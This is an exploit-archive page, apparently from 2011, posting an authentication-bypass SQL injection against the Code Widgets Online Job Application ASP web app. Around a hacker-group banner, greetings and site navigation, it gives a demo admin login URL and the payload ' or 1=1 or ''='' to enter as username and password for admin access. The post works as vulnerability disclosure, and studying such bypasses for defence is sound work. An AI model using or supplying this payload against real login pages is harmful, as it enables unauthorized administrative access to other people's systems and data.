Code Widgets Online Job Application SQL Injection

Code Widgets Online Job Application SQL Injection: Posted Aug 17, 2011; Authored by L0rd CrusAd3r; Code Widgets Online Job Application suffers from a remote SQL injection vulnerability that allows for authentication bypass.; tags | exploit, remote, sql injection; SHA-256 | 1a5bb687b34722c0f36474acc005c68cda516a1781f31ef466a68fe736e2d76a; Download | Favorite | View

Code Widgets Online Job Application SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            :  1337day.com                                  0
1                     inj3ct0r 1337 Day Team                           1
0                                                                      0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Code Widget Online Job Application Web App (ASP) Authentication Bypass Vulnerability
Vendor url: http://www.comriesoftware.net/codewidgets/product.aspx?key=180
Published: 17-August-2011
Greetz to:r0073r (1337day.com), r4dc0re, Sid3^effects,See Me, Awesomeness, Sonic Bluehat.
Special Greetz: inj3ct0r Team
Shoutzz:- To all My hacker friends

Price:100$  PS: This is not the cost of the Exploit but Cost of the Product..Information for n00bs alone 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*
Description:

ASP Project
List Job Postings and apply for postions online.
Includes all source code, Access database, Administration interface.

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*

Vulnerability:

*Authentication Bypass Vulnerability 

DEMO URL: http://www.codewidgets.net/CS0180/admin.asp

Attack Patern : ' or 1=1 or ''=''

Use for Username and Password

You got Logged in as an ADMIN

# 0day n0 m0re #
# L0rd CrusAd3r #

Top Authors In Last 30 Days

Red Hat 233 files
Ubuntu 70 files
indoushka 44 files
LiquidWorm 28 files
Debian 22 files
Apple 9 files
Google Security Research 8 files
Emiliano Febbi 4 files
Seth Jenkins 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (430)
Apple (2,125)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,152)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,727)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,169)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,955)
UNIX (9,472)
UnixWare (188)
Windows (6,784)
Other

Code Widgets Online Job Application SQL Injection

Code Widgets Online Job Application SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Code Widgets Online Job Application SQL Injection

Share This

Code Widgets Online Job Application SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems